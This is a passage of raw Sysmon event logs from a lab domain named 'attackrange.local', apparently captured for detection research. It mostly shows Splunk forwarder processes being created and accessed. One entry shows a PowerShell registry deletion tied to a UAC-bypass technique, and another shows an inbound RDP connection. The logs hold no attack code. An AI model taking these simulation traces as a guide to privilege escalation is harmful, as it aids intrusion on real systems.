Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001051447Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:50.276{466BC892-F5FE-60EB-8B7D-00000000CF01}10092C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000808583Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:50.211{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8546316859AB2E6EE28BDAF4511EE7FF,SHA256=B76C537D244A98977252A5DC3A3BDA45F243A5FB5C9591B8169FA650B1AB51F1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051446Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:50.259{466BC892-F5F9-60EB-897D-00000000CF01}1072ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\bob\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 12241200x80000000000000001051445Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-DeleteKey2021-07-12 07:57:50.243{466BC892-F5F9-60EB-897D-00000000CF01}1072C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-2333072374-3391925831-3197092227-1112\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\control.exe 23542300x80000000000000001051478Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:51.964{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DD2A8945AC3D3EC046DF36CC15B01932,SHA256=24FB1D6A848CAA072F6CFAF9CC06FD10281EC123C759FD3AB6BA55BACB57F3FC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051477Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:51.896{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F5FF-60EB-8D7D-00000000CF01}1328C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051476Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:51.880{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051475Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:51.880{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051474Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:51.880{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051473Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:51.880{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051472Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:51.880{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F5FF-60EB-8D7D-00000000CF01}1328C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001051471Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:51.880{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F5FF-60EB-8D7D-00000000CF01}1328C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001051470Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:51.881{466BC892-F5FF-60EB-8D7D-00000000CF01}1328C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001051469Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:51.466{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F9D5F293EA9EF432271BAAD6EC6692C6,SHA256=1B03763A4CD8D1C88A88DDAD542140C63D217917045F78B7384A6BFE681CB09F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808584Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:51.227{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=49988779A7D436616A690565F02DE822,SHA256=DF507F8859151ADD88E960472EDEB519DA7760EFF42CA8F630071B7C9197F0BA,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051468Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:43.664{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51103-false10.0.1.12-8000- 354300x80000000000000001051467Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:43.116{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse191.96.168.180-61418-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 10341000x80000000000000001051466Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:51.133{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F5FE-60EB-8C7D-00000000CF01}9800C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051465Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:51.131{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051464Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:51.131{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051463Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:51.131{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051462Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:51.131{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051461Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:51.130{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F5FE-60EB-8C7D-00000000CF01}9800C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001051460Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:51.130{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F5FE-60EB-8C7D-00000000CF01}9800C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001051459Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:50.964{466BC892-F5FE-60EB-8C7D-00000000CF01}9800C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001051458Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:51.081{466BC892-F5FE-60EB-8B7D-00000000CF01}100927452C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051488Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:52.995{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F600-60EB-8E7D-00000000CF01}8960C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051487Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:52.993{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051486Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:52.993{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051485Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:52.992{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051484Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:52.992{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051483Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:52.992{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F600-60EB-8E7D-00000000CF01}8960C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001051482Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:52.992{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F600-60EB-8E7D-00000000CF01}8960C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program 